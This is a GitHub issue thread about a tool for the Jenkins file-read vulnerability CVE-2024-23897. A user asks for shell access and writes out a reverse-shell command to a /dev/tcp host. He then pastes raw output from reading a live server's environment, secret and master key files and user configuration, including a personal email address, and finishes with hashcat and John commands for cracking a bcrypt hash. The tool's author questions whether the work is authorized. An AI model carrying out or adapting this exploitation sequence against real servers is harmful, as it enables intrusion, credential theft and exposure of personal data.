get-credentials-as-xml - Githubissues

sec13b commented 2 hours ago

how i can use list commands or more better , how we can get shell ?


ode: List Available Commands Mode
Command: help
add-job-to-view,build,cancel-quiet-down,clear-queue,connect-node,console,copy-job,create-credentials-by-xml,create-credentials-domain-by-xml,create-job,create-node,create-view,declarative-linter,delete-builds,delete-credentials,delete-credentials-domain,delete-job,delete-node,delete-view,disable-job,disable-plugin,disconnect-node,enable-job,enable-plugin,get-credentials-as-xml,get-credentials-domain-as-xml,get-gradle,get-job,get-node,get-view,groovy,groovysh,help,import-credentials-as-xml,install-plugin,keep-build,list-changes,list-credentials,list-credentials-as-xml,list-credentials-context-resolvers,list-credentials-providers,list-jobs,list-plugins,mail,offline-node,online-node,quiet-down,reload-configuration,reload-job,remove-job-from-view,replay-pipeline,restart,restart-from-stage,safe-restart,safe-shutdown,session-id,set-build-description,set-build-display-name,set-external-build-result,set-next-build-number,shutdown,stop-builds,update-credentials-by-xml,update-credentials-domain-by-xml,update-job,update-node,update-view,version,wait-node-offline,wait-node-online,who-am-i

wjlin0 commented 2 hours ago

You can read this article to understand https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html

But This is difficult to achieve. The old version of Jenkins user password is encrypted rather than hash. Tools such as jenkins-decrypt can be used to decrypt passwords, and some plug-ins can also be used for further attacks.

wjlin0 commented 2 hours ago

My tool can only help verify whether the vulnerability exists.

sec13b commented 2 hours ago

i read the article . can you indicate who are "the some plug-ins can also be used for further attacks"

sec13b commented 2 hours ago

if it used : /bin/bash

with : -a /bin/bash -c /dev/tcp/vps/11011

the command "/bin/bash -c 'bash -i >& /dev/tcp/vps/11011 0>&1'" cant be used

wjlin0 commented 2 hours ago

I haven't looked too closely at how this vulnerability can be rced, but you can try to read the file /var/jenkins_home/users/users.xml. If you can decrypt the administrator's password, you can log in to the background to use it. The essence of this vulnerability is to read the file caused by parsing errors, so you can try to start from the file.

sec13b commented 2 hours ago

i am not the magician hudini :D

wjlin0 commented 2 hours ago

The command in the tool and the command of shell are two different things. The command in the tool refers to the command of jenkins-cli, so the rebound shell you understand is two different things.

wjlin0 commented 2 hours ago

D

这句话是啥意思

sec13b commented 2 hours ago

i think missing or is moved ERROR: No such file: /var/jenkins_home/users/users.xml

jenkins:x:111:117:Jenkins,,,:/var/lib/jenkins:/bin/bash

wjlin0 commented 2 hours ago

It is possible that your goal is not deployed by default. Try other files that you can read, such as /erc/paaswd. As I said at the beginning, this vulnerability can only read files. rce can only be used in a specific environment. It is very difficult.

sec13b commented 2 hours ago

from environ :

Command: connect-node Filename: /proc/self/environ XDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkinsXDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkins

i just want to know where i can find users.xml

Filename: /proc/self/cmdline /usr/bin/java-Djava.awt.headless=true-Djava.net.preferIPv4Stack=true-Dhudson.DNSMultiCast.disabled=true-jar/usr/share/jenkins/jenkins.war--webroot=/var/cache/jenkins/war--httpPort=8080--httpListenAddress=0.0.0.0

wjlin0 commented 1 hour ago

from environ :

Command: connect-node

Filename: /proc/self/environ

XDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkinsXDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkins

i just want to know where i can find users.xml

read this /var/lib/jenkins/ users/user.xml

/var/lib/jenkins/secret.key

/var/lib/jenkins/secrets/master.key

sec13b commented 1 hour ago

for /var/lib/jenkins/secret.key ERROR: No such agent "13ff71cb60d11dc4e198bad1f28e4dd6968b95bd04aca543bd41e517c6ba866b" exists.

for /var/lib/jenkins/secrets/master.key ERROR: No such agent "cd4b3f7c97f5dd167f360ef444e0f4c2d5509ac18fc7269fd1662657fe9cc07f002a3a5aed1608e984ddfa7efdfcbcf33a652cb175c5b2b3d37005865a6f11205b87c59c5cc944d5657e4c857aaad269b839affdf4686b73810efba3308c1ceb406233efe5a1d1f9f61af496b834293c859a983be6751b9610e9bf28de7bdc66" exists.

for "@/var/lib/jenkins/users/users.xml"

<string>mft</string>: No such agent "      <string>mft</string>" exists.
      <string>54345792Malecl_5882327822420028333</string>: No such agent "      <string>54345792Malecl_5882327822420028333</string>" exists.
      <string>34802073Ordast_4358670235219068815</string>: No such agent "      <string>34802073Ordast_4358670235219068815</string>" exists.
      <string>jomatgithub_5935750980920288132</string>: No such agent "      
<string>jomatgithub_5935750980920288132</string>" exists.

for "@/var/lib/jenkins/users/jomatgithub_5935750980920288132/config.xml"

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
        <tokenList/>: No such agent "        <tokenList/>" exists.
        </hudson.model.AllView>: No such agent "        </hudson.model.AllView>" exists.
  <fullName>jomat+github</fullName>: No such agent "  <fullName>jomat+github</fullName>" exists.
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>: No such agent "    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>" exists.
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>: No such agent "          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>" exists.
    <hudson.search.UserSearchProperty>: No such agent "    <hudson.search.UserSearchProperty>" exists.
  </properties>: No such agent "  </properties>" exists.
      </tokenStore>: No such agent "      </tokenStore>" exists.
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">: No such agent "    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">" exists.
    </hudson.search.UserSearchProperty>: No such agent "    </hudson.search.UserSearchProperty>" exists.
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: No such agent "    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>" exists.
    </hudson.plugins.favorite.user.FavoriteUserProperty>: No such agent "    </hudson.plugins.favorite.user.FavoriteUserProperty>" exists.
      <insensitiveSearch>true</insensitiveSearch>: No such agent "      <insensitiveSearch>true</insensitiveSearch>" exists.
          <properties class="hudson.model.View$PropertyList"/>: No such agent "          <properties class="hudson.model.View$PropertyList"/>" exists.
  <properties>: No such agent "  <properties>" exists.
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">: No such agent "    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">" exists.
    <hudson.model.MyViewsProperty>: No such agent "    <hudson.model.MyViewsProperty>" exists.
        <hudson.model.AllView>: No such agent "        <hudson.model.AllView>" exists.
</user>: No such agent "</user>" exists.
      <autofavoriteEnabled>true</autofavoriteEnabled>: No such agent "      <autofavoriteEnabled>true</autofavoriteEnabled>" exists.
    </jenkins.security.ApiTokenProperty>: No such agent "    </jenkins.security.ApiTokenProperty>" exists.
    <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>: No such agent "    <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>" exists.
      <providerId>default</providerId>: No such agent "      <providerId>default</providerId>" exists.
      <views>: No such agent "      <views>" exists.
<user>: No such agent "<user>" exists.
    <hudson.model.PaneStatusProperties>: No such agent "    <hudson.model.PaneStatusProperties>" exists.
          <name>all</name>: No such agent "          <name>all</name>" exists.
<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">: No such agent "    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">" exists.
      <collapsed/>: No such agent "      <collapsed/>" exists.
    </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>: No such agent "    </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>" exists.
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: No such agent "    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>" exists.
      <data class="concurrent-hash-map"/>: No such agent "      <data class="concurrent-hash-map"/>" exists.
    </hudson.model.MyViewsProperty>: No such agent "    </hudson.model.MyViewsProperty>" exists.
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: No such agent "      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>" exists.
      <tokenStore>: No such agent "      <tokenStore>" exists.
          <filterExecutors>false</filterExecutors>: No such agent "          <filterExecutors>false</filterExecutors>" exists.
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">: No such agent "    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">" exists.
    <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">: No such agent "    <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">" exists.
      <triggers/>: No such agent "      <triggers/>" exists.
          <filterQueue>false</filterQueue>: No such agent "          <filterQueue>false</filterQueue>" exists.
    <jenkins.security.ApiTokenProperty>: No such agent "    <jenkins.security.ApiTokenProperty>" exists.
      </views>: No such agent "      </views>" exists.
    </hudson.model.PaneStatusProperties>: No such agent "    </hudson.model.PaneStatusProperties>" exists.
      <emailAddress>jomat+github@jmt.gr</emailAddress>: No such agent "      <emailAddress>jomat+github@jmt.gr</emailAddress>" exists.
    </hudson.tasks.Mailer_-UserProperty>: No such agent "    </hudson.tasks.Mailer_-UserProperty>" exists.
    <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">: No such agent "    <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">" exists.

ERROR: Error occurred while performing this command, see previous stderr output.

wjlin0 commented 1 hour ago

for /var/lib/jenkins/secret.key

ERROR: No such agent "13ff71cb60d11dc4e198bad1f28e4dd6968b95bd04aca543bd41e517c6ba866b" exists.

for /var/lib/jenkins/secrets/master.key

ERROR: No such agent "cd4b3f7c97f5dd167f360ef444e0f4c2d5509ac18fc7269fd1662657fe9cc07f002a3a5aed1608e984ddfa7efdfcbcf33a652cb175c5b2b3d37005865a6f11205b87c59c5cc944d5657e4c857aaad269b839affdf4686b73810efba3308c1ceb406233efe5a1d1f9f61af496b834293c859a983be6751b9610e9bf28de7bdc66" exists.

for "@/var/lib/jenkins/users/users.xml"


<string>mft</string>: No such agent "      <string>mft</string>" exists.

      <string>54345792Malecl_5882327822420028333</string>: No such agent "      <string>54345792Malecl_5882327822420028333</string>" exists.

      <string>34802073Ordast_4358670235219068815</string>: No such agent "      <string>34802073Ordast_4358670235219068815</string>" exists.

      <string>jomatgithub_5935750980920288132</string>: No such agent "      

<string>jomatgithub_5935750980920288132</string>" exists.

for "@/var/lib/jenkins/users/jomatgithub_5935750980920288132/config.xml"


Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

        <tokenList/>: No such agent "        <tokenList/>" exists.

        </hudson.model.AllView>: No such agent "        </hudson.model.AllView>" exists.

  <fullName>jomat+github</fullName>: No such agent "  <fullName>jomat+github</fullName>" exists.

    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>: No such agent "    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>" exists.

          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>: No such agent "          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>" exists.

    <hudson.search.UserSearchProperty>: No such agent "    <hudson.search.UserSearchProperty>" exists.

  </properties>: No such agent "  </properties>" exists.

      </tokenStore>: No such agent "      </tokenStore>" exists.

    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">: No such agent "    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">" exists.

    </hudson.search.UserSearchProperty>: No such agent "    </hudson.search.UserSearchProperty>" exists.

    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: No such agent "    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>" exists.

    </hudson.plugins.favorite.user.FavoriteUserProperty>: No such agent "    </hudson.plugins.favorite.user.FavoriteUserProperty>" exists.

      <insensitiveSearch>true</insensitiveSearch>: No such agent "      <insensitiveSearch>true</insensitiveSearch>" exists.

          <properties class="hudson.model.View$PropertyList"/>: No such agent "          <properties class="hudson.model.View$PropertyList"/>" exists.

  <properties>: No such agent "  <properties>" exists.

    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">: No such agent "    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">" exists.

    <hudson.model.MyViewsProperty>: No such agent "    <hudson.model.MyViewsProperty>" exists.

        <hudson.model.AllView>: No such agent "        <hudson.model.AllView>" exists.

</user>: No such agent "</user>" exists.

      <autofavoriteEnabled>true</autofavoriteEnabled>: No such agent "      <autofavoriteEnabled>true</autofavoriteEnabled>" exists.

    </jenkins.security.ApiTokenProperty>: No such agent "    </jenkins.security.ApiTokenProperty>" exists.

    <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>: No such agent "    <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>" exists.

      <providerId>default</providerId>: No such agent "      <providerId>default</providerId>" exists.

      <views>: No such agent "      <views>" exists.

<user>: No such agent "<user>" exists.

    <hudson.model.PaneStatusProperties>: No such agent "    <hudson.model.PaneStatusProperties>" exists.

          <name>all</name>: No such agent "          <name>all</name>" exists.

<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.

    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">: No such agent "    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">" exists.

      <collapsed/>: No such agent "      <collapsed/>" exists.

    </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>: No such agent "    </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>" exists.

    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: No such agent "    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>" exists.

      <data class="concurrent-hash-map"/>: No such agent "      <data class="concurrent-hash-map"/>" exists.

    </hudson.model.MyViewsProperty>: No such agent "    </hudson.model.MyViewsProperty>" exists.

      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: No such agent "      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>" exists.

      <tokenStore>: No such agent "      <tokenStore>" exists.

          <filterExecutors>false</filterExecutors>: No such agent "          <filterExecutors>false</filterExecutors>" exists.

    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">: No such agent "    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">" exists.

    <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">: No such agent "    <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">" exists.

      <triggers/>: No such agent "      <triggers/>" exists.

          <filterQueue>false</filterQueue>: No such agent "          <filterQueue>false</filterQueue>" exists.

    <jenkins.security.ApiTokenProperty>: No such agent "    <jenkins.security.ApiTokenProperty>" exists.

      </views>: No such agent "      </views>" exists.

    </hudson.model.PaneStatusProperties>: No such agent "    </hudson.model.PaneStatusProperties>" exists.

      <emailAddress>jomat+github@jmt.gr</emailAddress>: No such agent "      <emailAddress>jomat+github@jmt.gr</emailAddress>" exists.

    </hudson.tasks.Mailer_-UserProperty>: No such agent "    </hudson.tasks.Mailer_-UserProperty>" exists.

    <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">: No such agent "    <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">" exists.

ERROR: Error occurred while performing this command, see previous stderr output.

Is your penetration legal and compliant?

sec13b commented 1 hour ago

is mine

sec13b commented 1 hour ago

i have clave av , and this dont see what i run

wjlin0 commented 1 hour ago

I mean, are you authorized to act?

Otherwise, I may not be able to answer you.

Our discussion is limited to how to use tools.

sec13b commented 1 hour ago

is my Jenkins server .

sec13b commented 1 hour ago

i try : println(hudson.util.Secret.decrypt("{XXX=}"))

and println(hudson.util.Secret.fromString("{XXX=}").getPlainText())

dont show

wjlin0 commented 1 hour ago

i try :

println(hudson.util.Secret.decrypt("{XXX=}"))

and

println(hudson.util.Secret.fromString("{XXX=}").getPlainText())

dont show

This vulnerability can't support you to do this. Maybe that's all I can use. From the file you gave me, I can't see anything that can be used in the future.

sec13b commented 1 hour ago

i make update

wjlin0 commented 1 hour ago

i make update

yes

sec13b commented 37 minutes ago

with more Nvidia : John hashfile --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt

hashcat-m 3200 -O -w 4 $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm .\lists\rockyou.txt

wjlin0 / CVE-2024-23897

get-credentials-as-xml #2